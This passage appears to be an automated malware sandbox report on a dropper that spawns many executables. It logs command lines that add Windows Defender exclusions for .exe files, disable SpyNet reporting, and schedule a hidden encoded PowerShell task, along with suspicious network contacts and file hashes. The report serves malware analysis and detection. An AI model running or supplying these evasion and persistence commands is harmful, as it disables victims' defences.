ea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\Documents\GuardFox\hCzF7_6YmH1_yf7_aqOxLH8Z.exe
"C:\Users\Admin\Documents\GuardFox\hCzF7_6YmH1_yf7_aqOxLH8Z.exe"
C:\Users\Admin\Documents\GuardFox\cYGzvU0LJ7j1zdGYxn6a3LQ0.exe
"C:\Users\Admin\Documents\GuardFox\cYGzvU0LJ7j1zdGYxn6a3LQ0.exe"
C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe
"C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe"
C:\Users\Admin\Documents\GuardFox\wD7ladKU51wCHrt1VQbncYVb.exe
"C:\Users\Admin\Documents\GuardFox\wD7ladKU51wCHrt1VQbncYVb.exe"
C:\Users\Admin\Documents\GuardFox\oGELkeJJiv2cefOIHJeNoVfO.exe
"C:\Users\Admin\Documents\GuardFox\oGELkeJJiv2cefOIHJeNoVfO.exe"
C:\Users\Admin\Documents\GuardFox\qkR4Fs3GyEEMio3bz99eB7ke.exe
"C:\Users\Admin\Documents\GuardFox\qkR4Fs3GyEEMio3bz99eB7ke.exe"
C:\Users\Admin\Documents\GuardFox\nHczuLMIyPOo3HNGLcZReWeM.exe
"C:\Users\Admin\Documents\GuardFox\nHczuLMIyPOo3HNGLcZReWeM.exe"
C:\Users\Admin\Documents\GuardFox\I6UCCRLwkIvkU0kr5pn9tAke.exe
"C:\Users\Admin\Documents\GuardFox\I6UCCRLwkIvkU0kr5pn9tAke.exe"
C:\Users\Admin\AppData\Local\Temp\is-QAESQ.tmp\F6KP3rqn3LyQ85jnZsjhblYG.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QAESQ.tmp\F6KP3rqn3LyQ85jnZsjhblYG.tmp" /SL5="$60120,4078676,54272,C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe"
C:\Users\Admin\Documents\GuardFox\rt1S04Jegwg5fVerEbHNeyXS.exe
"C:\Users\Admin\Documents\GuardFox\rt1S04Jegwg5fVerEbHNeyXS.exe"
C:\Users\Admin\Documents\GuardFox\a0ffCtiHkAWh2WQD6jibWWLE.exe
"C:\Users\Admin\Documents\GuardFox\a0ffCtiHkAWh2WQD6jibWWLE.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC3DB.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC65B.tmp\Install.exe
.\Install.exe /iFFhdidlQI "525403" /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\5A60.exe
C:\Users\Admin\AppData\Local\Temp\75DC.exe
C:\Users\Admin\AppData\Local\Temp\75DC.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68f9758,0x7fef68f9768,0x7fef68f9778
C:\Users\Admin\AppData\Local\Temp\8806.exe
C:\Users\Admin\AppData\Local\Temp\8806.exe
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Users\Admin\AppData\Local\Temp\AB02.exe
C:\Users\Admin\AppData\Local\Temp\AB02.exe
C:\Users\Admin\AppData\Local\Temp\BE83.exe
C:\Users\Admin\AppData\Local\Temp\BE83.exe
C:\Users\Admin\AppData\Local\Temp\D83B.exe
C:\Users\Admin\AppData\Local\Temp\D83B.exe
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJhmruKOq" /SC once /ST 02:47:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Users\Admin\AppData\Local\Temp\is-20Q4N.tmp\BE83.tmp
"C:\Users\Admin\AppData\Local\Temp\is-20Q4N.tmp\BE83.tmp" /SL5="$50184,4061719,54272,C:\Users\Admin\AppData\Local\Temp\BE83.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 580
C:\Users\Admin\AppData\Local\Temp\E42E.exe
C:\Users\Admin\AppData\Local\Temp\E42E.exe
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Users\Admin\AppData\Local\Temp\is-C0DOH.tmp\E42E.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C0DOH.tmp\E42E.tmp" /SL5="$40164,4061719,54272,C:\Users\Admin\AppData\Local\Temp\E42E.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJhmruKOq"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\system32\taskeng.exe
taskeng.exe {1811B231-21B9-4379-9E95-8CE9F2C3F775} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\E89.dll
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\E89.dll
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223115727.log C:\Windows\Logs\CBS\CbsPersist_20240223115727.cab
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJhmruKOq"
Network
| Country | Destination | Domain | Proto |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 104.21.29.103:80 | def.bestsup.su | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.215.205:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| US | 104.21.4.60:443 | cleued.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| KR | 211.119.84.111:80 | cczhk.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 104.21.32.227:443 | pergor.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 172.67.180.119:443 | triedchicken.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| US | 172.67.215.205:443 | acenitive.shop | tcp |
| KR | 211.119.84.111:80 | cczhk.com | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 172.67.161.113:443 | carthewasher.net | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| US | 8.8.8.8:53 | selebration17io.io | udp |
| RU | 91.215.85.120:80 | selebration17io.io | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| FR | 91.121.181.6:9001 | tcp | |
| NL | 212.8.243.229:9001 | tcp | |
| DE | 185.213.155.169:5753 | tcp | |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| NL | 185.227.82.7:443 | tcp | |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 172.67.147.32:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | trmpc.com | udp |
| ET | 196.188.169.138:80 | trmpc.com | tcp |
| US | 8.8.8.8:53 | en.bestsup.su | udp |
| US | 104.21.29.103:80 | en.bestsup.su | tcp |
| DE | 185.220.101.198:10198 | tcp | |
| DE | 193.23.244.244:443 | tcp | |
| NL | 94.142.241.226:9443 | tcp | |
| NL | 45.66.33.45:443 | tcp | |
| SG | 116.12.180.234:9443 | tcp | |
| SE | 171.25.193.9:80 | tcp | |
| FR | 141.145.201.126:9001 | tcp | |
| NL | 95.142.102.58:9001 | tcp | |
| NL | 95.142.102.58:9001 | tcp | |
| FR | 141.145.201.126:9001 | tcp |
Files
memory/1728-0-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-1-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-2-0x00000000001E0000-0x00000000001E1000-memory.dmp
memory/1728-3-0x000007FEFD540000-0x000007FEFD5AC000-memory.dmp
memory/1728-4-0x000007FEFD540000-0x000007FEFD5AC000-memory.dmp
memory/1728-5-0x000007FEFD540000-0x000007FEFD5AC000-memory.dmp
memory/1728-6-0x00000000776D0000-0x0000000077879000-memory.dmp
memory/1728-8-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-7-0x000007FE80010000-0x000007FE80011000-memory.dmp
memory/1728-9-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-10-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-11-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-12-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-20-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/1728-21-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5784.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar57A7.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\Documents\GuardFox\a0ffCtiHkAWh2WQD6jibWWLE.exe
| MD5 | f70724dd145654e1fe8d4544e05b9c54 |
| SHA1 | 4fb2592c0c7e6f6e58aa709967435e41ef29a73f |
| SHA256 | e1882cc622c67ef0378e84cc913b6103144dff644cb29a353061e47e8813cc55 |
| SHA512 | 1102f5a25aefa1acfff7efabc664e891cf2a9cadc5e50d825de1f998db65e64e6687ca2f2443354656cae4af74c58ef24cc2159632411c2d527feb1efb1b8c60 |
C:\Users\Admin\Documents\GuardFox\qkR4Fs3GyEEMio3bz99eB7ke.exe
| MD5 | 87cb105ea0c6229687819a5a774cdf20 |
| SHA1 | dc8b201b3c70183499a513c418244f467d8ed8e4 |
| SHA256 | 819a4f6d9ee90ee1f3c2503cc82ea0b6adaea72fc9a9aedd2a060099730493fb |
| SHA512 | 5bc547f9c860c0b35cc011d8fbd7ca018daf1a16c92543bee488ae707523710eec6643d199d42efaf82ced910c3cdbcebcb17ce046b052fc3dd78fd252b76b1b |
C:\Users\Admin\Documents\GuardFox\I6UCCRLwkIvkU0kr5pn9tAke.exe
| MD5 | b6ff38aefda8aa267c5999e22d36f106 |
| SHA1 | 15f1e1187d27e92388a5dfd27a9dc6adbd2861f5 |
| SHA256 | e171bce99a2b38e68a7cb57c530373cef59fa147aaaa795f6c4985b4dfe1d008 |
| SHA512 | ee7cf7d0788e14a9684af6f6a913b4b96072405ebf26cb648d16b90f16829e39a857430d24ff3fb4724e3a9b573677c4f4160b4875b5f47fab7aecc2a397b12e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 77b27d4e0c3362a0523aa34d84f9d0b5 |
| SHA1 | fd589da7860f8c21385c825cc597c2744dfe348c |
| SHA256 | 82b1675e3b6375edfa034cfb6324fea2e16056fb54352da83b4c8d9d2079cc9f |
| SHA512 | 616ea3f40a20c4af2ba494595c25a13bf6d35f9e12e7c7aae9c4fd1ab33253e83b6bf4c7c506c17a69079363a19e7b518ee1da64045891b97ec675f00be0497a |
C:\Users\Admin\Documents\GuardFox\wD7ladKU51wCHrt1VQbncYVb.exe
| MD5 | 6696334ce6d64c354dac158b420146da |
| SHA1 | 7260dbbe814ae38cd4cc55f876b79f4b9bee282f |
| SHA256 | 78eb31482cff17c94e4dafecc3ceba9fac3951321cd9f292f750f37b1a7462ff |
| SHA512 | ebf2bac72d511038a9eee85ef88fd7011c3238b811f8b6cdd457b85aff1e648a903958d41420c2988d2f7e597e019dfcc0df5be405eca1dc38cfe86ac4d1b429 |
C:\Users\Admin\Documents\GuardFox\F6KP3rqn3LyQ85jnZsjhblYG.exe
| MD5 | 6e546e4dc5e888777a1955805cb680d6 |
| SHA1 | 4f2b2171ad451947a07d5fa15aa7a706397d6ace |
| SHA256 | 4e7eb5fcbb043183d3e5ed0d09db6d99bcf11b9e4bc232f90e33a9948e6166c1 |
| SHA512 | 3e70e488a7dedb8462591b55886c24a9b07ae4bcccae01a7fdd0cdb220772f2263c33d0d8ec9b789a2fe2a11e7355f3468a0c1326297dadd8c5670a14fa6891b |
C:\Users\Admin\Documents\GuardFox\oGELkeJJiv2cefOIHJeNoVfO.exe
| MD5 | 9eecbb5ad7d465190485a8cdb04cd406 |
| SHA1 | 7ccc8d9300163ec6bd0a3bf29900ed0a49fd1ecf |
| SHA256 | 88b54b8b78851084ff7e170ba52c51240d887606a26af3a6c62913804b3541a6 |
| SHA512 | 92c16c83836fc17b369760399920d67951797e228304a8ada9307dd9bef755c662168c1aa5e6b6f6c4a6ccebdb8d20ad8ddd9df8e34e79103eb081418ba87426 |
memory/1728-247-0x00000000001E0000-0x00000000001E1000-memory.dmp
memory/1728-246-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/1728-242-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Users\Admin\Documents\GuardFox\hCzF7_6YmH1_yf7_aqOxLH8Z.exe
| MD5 | 4593a31c693b8f33b3eba02a7c60b848 |
| SHA1 | 61b6741d20f3a4676445d03e59bdbe3e6ec8d5bd |
| SHA256 | e1d0f9ec4ac70cd6b82ffc83c998884bec267825082c653b05918fd4f3102742 |
| SHA512 | 71c616fa150031aa713cbff44970311f97ca675ca215a89d50787ce310ca06dff5b393aaab929e97cb39a4c500b83f9dbd60410bf9cba7de018f5530dff120a1 |
C:\Users\Admin\Documents\GuardFox\rt1S04Jegwg5fVerEbHNeyXS.exe
| MD5 | d92e6e105ac4dd0d98eb5118396d3dd2 |
| SHA1 | 5b94f9e355d559d3c50779340104785dec4fa077 |
| SHA256 | c8b5d05deeb33d9259297feaf2032357ac54e1fa4c35c267c2fd0c3cbc3e6d7c |
| SHA512 | 36958ce3e70e85e1dc23c27b1c0b892e8b9861bc379a177e074e4464581df52042f083e0b589787a5ec1860f5ce7cb21965a602136c6cffd8a9136dfe0568b8b |
memory/1728-261-0x000007FEFD540000-0x000007FEFD5AC000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 01a68b43fb51eb13f97e9da50457a464 |
| SHA1 | 846a95d8841e74cf5f93b09130261baa7a291858 |
| SHA256 | f2e7250eae6c3bc3c6b85e1fc661bd6283efe09fd82529834bff6ffe9445b331 |
| SHA512 | 2b4f0e0a67fe5f3071223d327899d89b9eacce4632e74fac71313a185f96198f8dacd6d78e5f85e4fd2a767074a41cbf2f4bb2c41fabe7feb46ec4692c6ba335 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
